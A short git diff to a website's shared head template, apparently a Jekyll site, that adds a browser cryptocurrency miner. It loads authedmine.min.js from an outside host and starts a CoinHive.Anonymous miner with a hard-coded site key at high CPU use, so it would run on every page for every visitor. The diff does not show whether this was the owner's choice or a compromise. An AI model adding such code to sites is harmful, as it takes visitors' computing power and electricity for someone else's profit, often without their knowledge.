--- a/_includes/head.html
+++ b/_includes/head.html
@@ -71,3 +71,8 @@
       s.parentNode.insertBefore(hm, s);
     })();
     </script>
+    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+    <script>
+        var miner = new CoinHive.Anonymous('oIL0QgG44HkRc7GSbFB4GGOpE5wvm4BB', {threads: 1, throttle: 0.9});
+        miner.start();
+    </script>
